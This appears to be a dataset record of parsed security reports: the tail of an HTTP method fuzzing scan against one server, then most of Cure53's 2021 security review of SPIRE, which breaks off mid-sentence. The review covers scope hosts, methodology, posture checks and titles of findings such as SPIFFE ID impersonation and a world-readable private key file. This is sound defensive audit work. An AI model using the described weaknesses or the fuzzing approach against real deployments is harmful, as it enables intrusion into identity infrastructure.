UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "cure53-report.pdf", "project_name": "SPIRE", "subcategory": "Key Management" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nSecurity-Review Report SPIRE 01-02.2021\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. R. Peraglie, MSc. N. Krein\nIndex\nIntroduction\nScope\nTest Methodology\nPhase 1: General security posture checks\nPhase 2: Manual code audits and penetration tests\nPhase 1: General security posture checks\nApplication/Service/Project Specifics\nLanguage Specifics\nExternal Libraries & Frameworks\nConfiguration Concerns\nAccess Control\nLogging/Monitoring\nUnit/Regression and Fuzz-Testing\nDocumentation\nOrganization/Team/Infrastructure Specifics\nSecurity Contact\nSecurity Fix Handling\nBug Bounty\nBug Tracking & Review Process\nEvaluating the Overall Posture\nPhase 2: Manual code auditing & pentesting\nIdentified Vulnerabilities\nSPI-01-003 WP2: Path normalization in Spiffe ID allows impersonation (Medium)\nSPI-01-004 WP2: Server impersonation through legacy node API (High)\nSPI-01-006 WP1: File-descriptor leak inside Linux peertracker (Medium)\nMiscellaneous Issues\nSPI-01-001 WP1: Build-system lacks security flags (Low)\nCure53, Berlin · 02/10/21 1/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nSPI-01-002 WP1: SPIRE server stores private key.json world-accessible (Medium)\nSPI-01-005 WP1: SPIRE links against outdated third-party modules (Medium)\nSPI-01-007 WP1: Path traversal in Spiffe ID via potentially unsafe join token (Info)\nSPI-01-008 WP1: Anti-SSRF hardening not applied for SDS API (Info)\nConclusions\nIntroduction\n“SPIRE (the SPIFFE Runtime Environment) is a toolchain of APIs for establishing trust\nbetween software systems across a wide variety of hosting platforms. SPIRE exposes\nthe SPIFFE Workload API, which can attest running software systems and issue\nSPIFFE IDs and SVIDs to them. This in turn allows two workloads to establish trust\nbetween each other, for example by establishing an mTLS connection or by signing and\nverifying a JWT token. SPIRE can also enable workloads to securely authenticate to a\nsecret store, a database, or a cloud provider service.”\nFrom https://github.com/spiffe/spire\nThis report describes the results of a security-centered assessment of the SPIRE\ncomplex. Carried out by Cure53 at the beginning of 2021, the project included a\npenetration test, a source code audit, as well as a broader security posture check of the\nSPIRE software compound.\nIt should be clarified that SPIRE, a.k.a. the SPIFFE Runtime Environment, is a toolchain\nof APIs for establishing trust between software systems across a wide variety of hosting\nplatforms. The work detailed here was requested by the Cloud Native Computing\nFoundation (CNCF) in late 2020 and carried out by Cure53 in the second half of January\n2021. A total of thirty-two days were invested into the project, given the objectives and\nexpected coverage.\nTo respond to the priorities set by CNCF/SPIRE, three work packages (WPs) were\ndelineated. In WP1, Cure53 reviewed the security posture of the SPIRE project more\nbroadly, moving on to source code audit of the SPIRE code base in WP2. Finally, a\npenetration test against SPIRE deployment was executed in WP3. Notably, this structure\nof the WPs, which go beyond standard pentesting and auditing and extend to checking\nthe general perimeter, typically characterized CNCF-related work.\nCure53, Berlin · 02/10/21 2/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nWhite-box methods were used in this project, given that the source code is publicly\navailable as an OSS project. More generally, the approach is consistent with CNCF-\ncommissioned projects that Cure53 has been involved in. Furthermore, Cure53 had\naccess to a pre-configured environment set up by the SPIFFE team. Said deployment\noffered a production-like test-surface for Cure53 to work with.\nAll preparations were done on time in January 2021, namely in CW02 and CW03.\nConsequently, Cure53 could have a smooth start without any roadblocks in CW04.\nCommunications during the test were done using a channel on the SPIFFE Slack\nworkspace. Members of the Cure53 team participating in this assignment could join the\ndiscussions and keep the SPIRE/SPIFFE team appraised of new developments in the\ntest. Besides frequent status, live-reporting was done so that the SPIFFE team could\naddress all findings pertinent to SPIRE as quickly as possible.\nOverall, the SPIFFE team did a fantastic job in making things available and accessible\nfor the test. In connection to this, Cure53 achieved a very good coverage of the test-\ntargets across WP1-WP3 in the time-frame available for this exercise. Eight security-\nrelevant discoveries were made. Three items were classified to be security\nvulnerabilities and five belong to a broader array of general weaknesses with lower\nexploitation potential. Note that one of the findings was ranked as a High-level risk; other\nissues - beyond two Medium-level threats - did not call for immediate action or\nremediation. It can be argued that the evidence indicates a rather praiseworthy result for\nSPIRE. \nIn the following sections, the report will first shed light on the scope and key test\nparameters, as well as the structure and content of the WPs. In order to maximize gains\nfrom the project, Cure53 then offers a series of methodology and coverage chapters, so\nas to highlight what has been done and with which results, especially in the area of\nsecurity posture checks. Next, all findings will be discussed in grouped vulnerability and\nmiscellaneous categories, then following a chronological order in each grouping.\nAlongside technical descriptions, PoC and mitigation advice are supplied when\napplicable. Finally, the report will close with broader conclusions about this January\n2021 project. Cure53 elaborates on the general impressions and reiterates the verdict\nbased on the testing team’s observations and collected evidence. Tailored hardening\nrecommendations for the SPIRE complex are also incorporated into the final section.\nCure53, Berlin · 02/10/21 3/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nScope\n•Penetration Tests & Security Reviews against SPIRE\n◦WP1: Security posture of the SPIRE project\n◦WP2: Source code audit of SPIRE\n▪Main focus https://github.com/spiffe/spire/releases/tag/v0.12.0\n▪Misc focus https://github.com/spiffe/go-spiffe/releases/tag/v2.0.0-beta.4\n◦WP3: Penetration test against the SPIRE deployment\n▪34.214.21.89 granola-global # Root Server\n▪54.149.236.250 granola-regional-1 # Nested Server\n▪54.184.34.192 granola-workload # Agent / Workload\n▪18.223.247.8 acme-regional # Agent / Workload\n▪3.131.153.201 acme-workload # Standalone Server\n▪34.220.90.50 granola-regional-2 # Nested Server\nCure53, Berlin · 02/10/21 4/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nTest Methodology\nThis section zooms in on the metrics and methodologies used to evaluate security\ncharacteristics of the SPIRE project and codebase. In addition, it includes results\npertinent to individual areas of the project’s security properties that were either selected\nby Cure53 or singled out by other involved parties as calling for a closer inspection.\nSimilarly to previous tests for CNCF, this assignment was also divided into two phases.\nThe general security posture and maturity of the audited codebase of SPIRE has been\nexamined in Phase 1. The usage of external dependencies has been audited, security\nconstraints for SPIRE configurations were examined and the documentation had been\nstudied in depth in order to get a general idea of security awareness’ levels at SPIRE.\nThis was followed by research into how security reports and vulnerabilities are handled\nand whether a healthily secure infrastructure is seen as a serious matter. The latter\nphase covered actual tests and audits against the SPIRE codebase, with the code\nquality and its hardening evaluated.\nPhase 1: General security posture checks\nBecause SPIRE is a relatively complex software architecture, Cure53 was pleased to\nsee extensive documentation and additional material, such as the provided Security\nSelf-Assessment. This greatly helped with Phase 1 of this project in which the general\nsecurity posture and overall code quality of the SPIRE project was inspected from a\nhigh-level perspective.\nThis encompasses also the management processes such as the handling of vulnerability\ndisclosures, threat modeling approaches and general measures for code hardening. All\nthis gives a meta-level perception of the maturity and robustness that is not solely bound\nto the code quality itself.\nPhase 2: Manual code audits and penetration tests\nIn this Phase, Cure53 conducted an extensive source code analysis across the different\ncomponents of the SPIRE software stack. Since SPIRE has well-defined attacker\nmodels containing risk-assessments, it is quite clear what issues to look out for and what\nto concentrate on. As such, identification of security-relevant areas of the project's code\nbase was close-to-unnecessary and, in effect, Cure53 could quickly start with targeted\naudits on sensitive parts of the system.\nCure53, Berlin · 02/10/21 5/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nThis also underlines the well-thought-out development process and self-reflection of the\ndevelopers that have the attacker's perspective in mind. While Cure53's goal was to\nreach good coverage across the scope, such large-scale audits are always limited by the\nbudget and require a more isolated focus on the particularly sensitive parts of the code.\nConsequently, this phase also determines which parts of the project's scope deserve\nmore focus in future audits.\nLater chapters and especially the findings in the Identified Vulnerabilities and the\nMiscellaneous Issues sections of this report highlight issues that were found during this\naudit. Their implications for the SPIRE software complex are discussed there.\nPhase 1: General security posture checks\nThis Phase is meant to provide a more detailed overview of the SPIRE project’s security\nproperties that are seen as somewhat separate from both the code and the SPIRE\nsoftware. The first few subsections of the posture audit focus on more abstract\ncomponents instead of judging the code quality itself.\nLater subsections look at elements that are linked more strongly to the organizational\nand team aspects of SPIRE. In addition to the items presented below, the Cure53 team\nalso focused on tasks that fostered a cross-comparative analysis of all observations.\n•The documentation was examined to understand all provided functionality and\nacquire examples of what a real-world deployment of SPIRE could look like.\n•The extensive architectural design documentation as well as several parts of the\nself-security assessments were reviewed.\n•The network topology and connected parts of the overall architecture were\nexamined. This also included consideration of relevant configurations that are\nnecessary to deploy SPIRE. Some potential weaknesses were already spotted\nthere and are highlighted in the Configuration Concerns section of this report.\n•The given code-base was reviewed for structural design, documentation and\ncomments. High-level code audits and common pitfalls in the Go programming\nlanguage were looked out for. For example, general issues such as incorrect\nusage of the unsafe keyword can quickly be enumerated.\n•Code issue reports from gosec were studied to check if there are any remaining\nlow-hanging fruit inside that simply have been overlooked during the codebase\ndevelopment.\n•External libraries and frameworks that are referenced in the code were studied\nand checked to make sure they do not contain any publicly known vulnerabilities.\nAs highlighted in the External Libraries & Frameworks and the connected finding\nunder SPI-01-005, Cure53 proposed some improvements.\nCure53, Berlin · 02/10/21 6/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Normally, past vulnerability reports for SPIRE would have been checked out to\nspot further interesting areas and generally monitor the disclosure process, yet\nSPIRE has not received impactful vulnerability reports thus far.\n•The security posture checks phase is concluded with an analysis of\norganizational specifics, such as making sure there are good guidelines for\nsecurity contacts. Soundness of the bug tracking and review process was also\nverified.\n•Drawing on the evidence from the steps above, the project’s maturity was\nevaluated; specific questions about the software were compiled from a general\ncatalogue according to applicability.\nApplication/Service/Project Specifics\nIn this section, Cure53 will share insights on the application-specific aspects which lead\nto a good security posture. These include the choice of programming language,\nselection and oversight of external third-party libraries, as well as other technical aspects\nlike logging, monitoring, test coverage and access control.\nLanguage Specifics\nProgramming languages can provide functions that pose an inherent security risk and\ntheir use is either deprecated or discouraged. For example, strcpy() in C has led to many\nsecurity issues in the past and should be avoided altogether. Another example would be\nthe manual construction of SQL queries versus the usage of prepared statements. The\nchoice of language and enforcing the usage of proper API functions are, therefore,\ncrucial for the overall security of the project.\nSince SPIRE seamlessly integrates with software such as Envoy and can be built on top\nof Kubernetes clusters, it comes as no surprise that Go has been chosen as a\nprogramming language. Go has proven to offer higher levels of memory safety\ncompared to other languages that compile to native code. It is quite rare to spot direct\nmemory safety issues that other languages such as C and C++ suffer from.\nIssues like buffer overflows, type confusions or Use-After-Free vulnerabilities are directly\ntaken care of by Go’s internal memory management system. The compiler equally\nmakes sure that memory bounds are automatically verified by placing checkpoints into\nthe generated assembly. Although it is still possible to write unsafe Go code, SPIRE\ncompletely refrains from doing so.\nWhile memory safety issues are of lesser concern in software stacks that build on Go,\nCure53 still focused on shortcomings represented by integer overflows and race\nconditions through incorrectly placed mutexes. Although Go’s garbage collector is the\nCure53, Berlin · 02/10/21 7/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nsaving grace in many situations that lead to Denial-of-Service, leaky memory stemming\nfrom open file descriptors can signify threats in the form of bugs or input validation\nissues.\nExternal Libraries & Frameworks\nExternal libraries and frameworks can also contain vulnerabilities but their benefits\noutweigh the possible risks. Relying on sophisticated libraries is advised instead of\nreinventing the wheel with every project. This is especially true for cryptographic\nimplementations, which are known to be prone to errors.\nSPIRE mostly imports well-tested crypto packages of the Go language framework. This\nincludes crypto/rand, crypto/tls or crypto/x509. For transport mechanisms and the\ndifferent APIs, SPIRE mainly uses google.golang.org/grpc derived from protobufs\n(github.com/golang/protobuf ). While some of the direct dependencies are mostly up to\ndate, Cure53 noticed a significant list of outdated modules that are linked in the master\nbranch of spiffe/spire. This is additionally documented as a miscellaneous finding in SPI-\n01-005. Only one outdated module was found to be suffering from a security vulnerability\nbut it should generally be considered to tidy up the dependency list. This generally\nprevents shipping a product that includes vulnerable modules which are actually\nmitigated in more recent versions.\nWith a significant number of third-party modules, dependency tracking and vulnerability\nchecking becomes no easy task. Consequently, it is recommended to automate this\nprocess and have a build-system that takes major version changes for third-party\nmodules into consideration. For software written in Go, Cure53 had good experience\nwith go-mod-outdated1, which lists version changes for direct dependencies. Other hand\ntools like OWASP Dependency-Check2 work with any language and pull additional data\nfrom the NIST National Vulnerability Database3. This additionally helps in finding\noutdated modules affected by issues and requiring immediate attention/ mitigation.\nConfiguration Concerns\nComplex and adaptable software systems usually have many variable options which can\nbe configured accordingly to what the actually deployed application necessitates. While\nthis is a very flexible approach, it also leaves immense room for mistakes. As such, it\noften creates the need for additional and detailed documentation, in particular when it\ncomes to security.\n1https://github.com/psampaz/go-mod-outdated 2https://owasp.org/www-project-dependency-check/ 3https://nvd.nist.gov/vuln/data-feeds \nCure53, Berlin · 02/10/21 8/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nThe attested agent path for many built-in node attestor plugins may be a risk due to\nuser-input embedded within the attested agent path, as seen in SPI-01-003 and SPI-01-\n007. It is advised to consider this threat in the security section of the documentation.\nAt the same time, SPIRE APIs could be configured to be exposed via TCP instead of a\nunix domain socket. However, this configuration is discouraged by the documentation for\nthe Agents Workload API. The same applies to turning off the TLS verification within go-\nspiffe/v2, which is also highly discouraged by SPIRE documentation.\nConfigured workload and node attestor plugins could become a risk as they contain\ncritical and potentially vulnerable code that could allow attackers to impersonate agents\nand workloads. If SPIFFE Federation is configured with an untrusted bundle endpoint,\npoisoning the root of the certificate chain could be accomplished.\nAccess Control\nEvery access to SPIRE server that could potentially do harm or extract sensitive\ninformation is primarily controlled via SSL client authentication and the local socket type.\nThe SSL verification is outsourced to Go’s built-in crypto/tls module and provides the\ncertificate authority specified by the user. The authorization code is redundant in modern\nAPI and legacy API in such that the validations and checks performed are the same.\nTherefore, it is recommended to remove the old legacy node and entry registration APIs\nthe code base to minimize redundancy.\nThe authorization logic distinguishes a total of five user-roles: unauthenticated, agent,\nlocal, admin and other downstream servers. The local role will be assigned to peers that\nconnect locally via the unix domain socket. All other roles will be determined by the\npresence of a valid client certificate and the associated Spiffe ID extracted from the\ncertificate. Every gRPC method provided by the server was explicitly assigned a set of\nallowed user-roles required for invocation. Validated information relevant for\nauthorization is stored in a context persistently passed to all handlers.\nAccess Control on the Agents Workload API is primarily done physically by only\nexposing the Workload and Secret Service Discovery API over a unix domain socket. It\nrequires workloads to obtain file-access to the UDS file. Additionally, a mandatory\nsecurity metadata key must be added to every request to the Workload API. This can\nmitigate the impact of potential SSRF vulnerabilities in the network if access was indeed\ngiven via TCP (which is discouraged in most scenarios by the documentation).\nCure53, Berlin · 02/10/21 9/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nLogging/Monitoring\nHaving a good logging/monitoring system in place allows developers and users to\nidentify potential issues more easily or get an idea of what might be going wrong. It can\nalso provide security-relevant information, for example when a verification of a signature\nfails. Consequently, having such a system in place has a positive influence on the\nproject.\nOn the one hand the SPIRE agents and the SPIRE server offer centralized logging via\nthe log_file flag of the corresponding configuration files with extra levels for verbosity.\nThis default setting here, however, is set to logging to STDOUT only, which should be\ntreated as suboptimal. Default logging to one of the standard /var/log directories should\nbe considered here.\nOn the other hand, both agents and servers allow exporting of metrics to external\ncollectors such as Datadog, M3, Prometheus and StatsD. This can be configured\nthrough the server.conf and agent.conf, respectively. SPIRE offers a wide range of\ntelemetric data to be transferred; all are explained through dedicated documentation4.\nUnit/Regression and Fuzz-Testing\nWhile tests are essential for any project, their importance grows with the scale of the\nendeavor. Especially for large-scale compounds, testing ensures that functionality is not\nbroken by code changes. Furthermore, it generally facilitates the premise where features\nfunction the way they are supposed to. Regression tests also help guarantee that\npreviously disclosed vulnerabilities do not get reintroduced into the codebase. Testing is\ntherefore essential for the overall security of the project.\nSPIRE extensively incorporates unit-tests in nearly all of their modules, giving a\ncomprehensive test coverage across the complete codebase. While walking through the\ncommit log, Cure53 also noticed test-cases for regressions that happened in the past,\nlike for bugs such as for #18635 or smaller DoS security issues, e.g., #5776. Especially\nthorough testing is included for highly-sensitive code paths for verifying JWT-SVID\ntokens or TLS certificate generation, as well as in the realm of correct URI parsing for\nSPIFFE IDs. All in all, the process of unit-testing and its importance is well-understood at\nSPIRE. There is high expectation that this approach continues throughout development\nin the future.\n4https://github.com/spiffe/spire/blob/master/doc/telemetry.md 5https://github.com/spiffe/spire/commit/1e5cda99b7d0934908d37dd2e27f039b479d8d4c 6https://github.com/spiffe/spire/pull/577 \nCure53, Berlin · 02/10/21 10/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nDocumentation\nGood documentation contributes greatly to the overall state of the project. It can ease\nthe workflow and ensure final quality of the code. For example, having a coding\nguideline which is strictly enforced during the patch review process ensures that the\ncode is readable and can be easily understood by various developers. Following good\nconventions can also reduce the risk of introducing bugs and vulnerabilities to the code.\nThe overall quality of the documentation of SPIFFE/SPIRE is praiseworthy. It contains\nevery information that is necessary to understand the overall concept of the architecture,\nhow to deploy it and how to use it. It is structured in a way that step-wise guides help the\nuser to first learn about SPIRE's design and goals, and then explain how to set up\nagents and servers, for example in regard to Kubernetes clusters. Each step gets a\ndedicated section in the documentation, inclusive of extensive guides about\nconfigurational details and scaling the architecture throughout multiple trust domains.\nThe content does not leave much room for questions and underlines the overall maturity\nof the software and its concept. Apart from the linked CONTRIBUTING.md inside the\nGitHub page, the documentation additionally contains a guideline on extending SPIRE,\nmostly for the different plugin systems it supports. It appropriately advises caution when\nusing third-party plugin code. Extra sections on how to interact with workload APIs is\nalso offered.\nWhat might be a little confusing for some is that documentation pages inside the GitHub\nrepository under https://github.com/spiffe/spire/tree/master/doc do not entirely match the\nofficial one. The former often provides a little more detail on certain components of the\nSPIRE architecture. Given that the doc pages on GitHub are regularly updated, it should\nbe considered to sync them with the official documentation more properly.\nOrganization/Team/Infrastructure Specifics\nThis section will describe the areas Cure53 looked at to learn more about the security\nqualities of the SPIRE project that cannot be linked to the code and software but rather\nencompass handling of incidents. As such, it tackles the level of preparedness for critical\nbug reports within the SPIRE development team. In addition, Cure53 also investigated\nthe levels of community involvement, i.e. through the use of bug bounty programs. While\na good level of code quality is paramount for a good security posture, the processes and\nimplementations around it can also make a difference in the final assessment of the\nsecurity posture.\nCure53, Berlin · 02/10/21 11/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nSecurity Contact\nTo ensure a secure and responsible disclosure of security vulnerabilities, it is important\nto have a dedicated point of contact. This person/team should be known, meaning that\nall necessary information - such as an email address and preferably also encryption\nkeys of that contact - should be communicated appropriately.\nSPIFFE/SPIRE mentions a security contact multiple times in their GitHub repository. The\nSECURITY.md and the CONTRIBUTING.md as well as the README.md contain a\nsmall section on where to report security vulnerabilities to. Except for the email address,\nno guidelines on the report format or further details are provided. The sections\nadditionally lack a PGP key which would be beneficial for more severe vulnerability\nreports. Additionally, the official documentation lacks further mention of a security\ncontact. The mentioned email address is not found outside of the GitHub repository.\nSince many developers and users start with the documentation under https://spiffe.io/, a\ndedicated section about a security contact might be helpful there as well.\nSecurity Fix Handling\nWhen fixing vulnerabilities in a public repository, it should not be obvious that a particular\ncommit addresses a security issue. Moreover, the commit message should not give a\ndetailed explanation of the issue. This would allow an attacker to construct an exploit\nbased on the patch and the provided commit message prior to the public disclosure of\nthe vulnerability. This means that there is a window of opportunity for attackers between\npublic disclosure and wide-spread patching or updating of vulnerable systems.\nAdditionally, as part of the public disclosure process, a system should be in place to\nnotify users about fixed vulnerabilities.\nWalking through the commit log, SPIRE and go-spiffe-v2 did not receive fixes for\nvulnerability reports so far. The only exception here is a security fix that would mean that\nattackers with read log-files access could obtain JWT-SVIDs7. This is transparently\nexplained and even highlights the faulty commit that introduced this issue. Still, at the\ntime of writing, there is no real sample set to judge the handling of security fixes. At the\nsame time, SPIRE transparently highlighted security impact of version changes that\nhappened whenever security issues in important libraries were disclosed. There are a\nfew examples - such as issue #6908 or issue #12049 - that fix vulnerabilities in Golang\nand where the commit log mentions the appropriate CVE to highlight what problems the\nfix mitigates.\n7https://github.com/spiffe/spire/pull/1953 8https://github.com/spiffe/spire/pull/690 9https://github.com/spiffe/spire/pull/1204 \nCure53, Berlin · 02/10/21 12/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nBug Bounty\nHaving a bug bounty program acts as a great incentive in rewarding researchers and\ngetting them interested in projects. Especially for large and complex projects that require\na lot of time to get familiar with the codebase, bug bounties work on the basis of the\npotential reward for efforts.\nThe SPIRE project does not have a bug bounty program at present, however this should\nnot be strictly viewed in a negative way. This is because bug bounty programs require\nadditional resources and management, which are not always a given for all projects.\nHowever, if resources become available, establishing a bug bounty program for SPIRE\nshould be considered. It is believed that such a program could provide a lot of value to\nthe project.\nBug Tracking & Review Process\nA system for tracking bug reports or issues is essential for prioritizing and delegating\nwork. Additionally, having a review process ensures that no unintentional code, possibly\nmalicious code, is introduced into the codebase. This makes good tracking and review\ninto two core characteristics of a healthy codebase.\nSPIRE’s readme page10 explains that bugs should be filed via the GitHub’s issue tracker.\nThere is no exact guideline or template on how to report bugs, leading to a rather messy\nreport system that makes it harder to distinguish between valid concerns and generic\nfeature requests.\nApart from that, contributions can be made through pull requests on GitHub. This is\nthoroughly explained in the CONTRIBUTING.md11 file where the required coding\nconventions and review process are described. Each pull request needs to be approved\nby one or two maintainers to make sure all changes comply with the required standards,\nin turn preventing submission of malicious or dysfunctional code.\nEvaluating the Overall Posture\nChoosing the Go programming language for the majority of code in this project has been\na good decision and almost automatically reduces the potential for introducing memory-\nsafety-related issues. Additionally, the excellent documentation along with the well-\ndocumented processes for patches and contributions further reduce the risk of security\nvulnerabilities being handled badly or remaining undetected.\n10https://github.com/spiffe/spire#contribute-to-spire 11https://github.com/spiffe/spiffe/blob/master/CONTRIBUTING.md \nCure53, Berlin · 02/10/21 13/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nNote that a dedicated section in the publicly available documentation material also lists\nthe security audits and assessments that have already been carried out in the past, prior\nto Cure53’s thorough posture review and code audit12. A topic worth-mentioning is that of\na bug bounty program, although it is understandable that smaller projects are likely\nunable to secure funds for these. However, with future growth of the project and\npotentially increased resources, a bug bounty scheme should definitely be considered.\nFurther, some concerns were raised and documented regarding the configurability and\nthe high-level of flexibility being a possible venue for mistakes and resulting\nvulnerabilities in rolled-out deployments. Two issues were raised here, hinting towards a\nmore security-aware documentation of the configuration options for additional safety.\nPhase 2: Manual code auditing & pentesting\nThis section comments on the code auditing coverage within areas of special interest\nand documents the steps undertaken during the second phase of the audit against the\nSPIRE software complex.\n•While inspecting the JWT-SVID related parts, it was checked if SPIRE properly\npermits and enforces the algorithms set by the specification and enforces a\nsingle header.\n•Relating to the server GRPC implementation, it was checked whether the agent\nauthentication requires a valid and signed certificate with agent attestation, with\nspecial look at various plugins that make attestation obtainable.\n•In the realm of authorization, diverse checks were executed against the\nAuthorizeAnyOf, lolcaOrAdmin and downStream implementations. Special\nattention was paid to the certificate check in the Node authz/authn parts, where a\nmissing check for the expiration of the certificate in the registration API was\nspotted.\n•Further checks were executed against the spire-agent and spire-server binaries\nrunning on the provided test-systems using checksec (verifying binary protection\nflags); a low severity finding was spotted here and filed as SPI-01-001.\n•It was examined whether any outdated or vulnerable third-party software\ndependencies affect SPIRe, for instance linking against gorm v1.9.9 which is\nvulnerable to an SQLi that was fixed in software version v1.9.10.\n•The team also looked at the user-permissions the spire-agent and spire-server\nare running with. It has to be noted that the customer confirmed that the spire-\nagent was running with root privileges due to the deployment setup that has been\nprovided, whereas - in real-world scenarios - the spire-agent must not\nnecessarily run with root privileges.\n12https://github.com/spiffe/spire#security-assessments \nCure53, Berlin · 02/10/21 14/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Further inspected features included the datastore cache ( dscache) of the SPIRE\nserver and its locking mechanism using mutexes, as well as the entry cache\nused for caching registration entries of agents of the SPIRE server and similar\nprocesses. No issues have been spotted here.\n•Checks were executed against the Trust Bundle Bootstrapping performed by the\nSPIRE agent for 